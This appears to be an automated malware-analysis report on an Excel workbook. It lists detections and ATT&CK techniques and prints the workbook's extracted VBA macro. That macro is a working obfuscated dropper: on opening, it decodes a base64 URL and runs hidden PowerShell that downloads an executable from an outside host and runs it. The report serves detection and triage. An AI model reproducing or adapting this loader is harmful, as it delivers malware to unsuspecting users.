MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The sample contains an obfuscated VBA macro that executes upon opening the workbook. The macro decodes a URL and uses PowerShell to download and execute a file named 'putty.exe' from that URL to the temporary directory. The ClamAV detection 'Xls.Dropper.EPPlus-9802867-2' further confirms its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4943 bytes |
SHA-256: 169567357595ae8479cae3fa56492c98afee8a79727b150c2ed3d166a9bef4d5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"aHR0cDovL2NvbWF3aGltcGxldC5jb20vbnh4dC5leGU="
End Sub
Public Sub Loader(Link As String)
CreateObject(OHbOYszJOHqgDkedBOSubRocPBgnBNntYHuaNqBaWDWNOzvzSRAZATe("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub
Function fd3icrngvzu(str As String) As Variant: Dim bytes() As Byte: bytes = str: fd3icrngvzu = bytes: End Function
Function e55wb1k43zzcli1p6(bytes() As Byte) As String: Dim str As String: str = bytes: e55wb1k43zzcli1p6 = str: End Function
Function hp61wnmk00h25j9vs(str As String) As String
Const VBCGhdMK_ As String = "m2uerz0kiwwwjhmlc"
Dim GKiaNHB_() As Byte, SokNAH_() As Byte
GKiaNHB_ = fd3icrngvzu(str)
SOtAN_ = fd3icrngvzu(VBCGhdMK_)
Dim BoLpaBH As Long
BoLpaBH = UBound(GKiaNHB_)
ReDim KoSoVoBPo_(0 To BoLpaBH) As Byte
Dim idx As Long
For idx = LBound(GKiaNHB_) To BoLpaBH:
If Not GKiaNHB_(idx) = 0 Then
c = GKiaNHB_(idx)
For i = 0 To UBound(SOtAN_):
c = c Xor SOtAN_(i)
Next i
KoSoVoBPo_(idx) = c
End If
Next idx
hp61wnmk00h25j9vs = e55wb1k43zzcli1p6(KoSoVoBPo_)
End Function
Public Function OHbOYszJOHqgDkedBOSubRocPBgnBNntYHuaNqBaWDWNOzvzSRAZATe(ByVal EmQZTpMNoPPgDmQqfolNHJfeVdRHwkIRZIvxkPMSoNudyOhjXRiDLln As String) As String
Dim je2e1ms1s5lqbhib6 As String
Dim jmb5q1r64xbbr9w1k As String
Dim g6ttyb80srsf254xu As Long
For mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev = 1 To Len(EmQZTpMNoPPgDmQqfolNHJfeVdRHwkIRZIvxkPMSoNudyOhjXRiDLln) Step 3
wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = Chr$(Val(hp61wnmk00h25j9vs("D" & Chr(42)) & Mid$(EmQZTpMNoPPgDmQqfolNHJfeVdRHwkIRZIvxkPMSoNudyOhjXRiDLln, mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev, 2)))
jmb5q1r64xbbr9w1k = jmb5q1r64xbbr9w1k & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
Next mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev
OHbOYszJOHqgDkedBOSubRocPBgnBNntYHuaNqBaWDWNOzvzSRAZATe = jmb5q1r64xbbr9w1k
End Function
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, hp61wnmk00h25j9vs("B" & ""), "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, hp61wnmk00h25j9vs(" " & "" & " " & "" & Chr(17) & "" & Chr(7) & Chr(84) & "V" & "" & "&" & Chr(7) & Chr(1) & "" & Chr(6) & Chr(7) & ""), hp61wnmk00h25j9vs(" " & Chr(3) & Chr(6) & "" & "B" & " " & "" & " " & " " & "" & Chr(7) & "" & "T" & "" & "V" & "B" & "" & " " & " " & "" & " " & " " & "" & " " & "" & Chr(5) & Chr(76) & "")
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = hp61wnmk00h25j9vs(Chr(95) & "") Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exi
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6656 bytes |
SHA-256: 85aef9d827a611468b73e30d6daa19f3d1cea7fa39d970322e18371a47831b41 |
|||
|
Detection
ClamAV:
Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.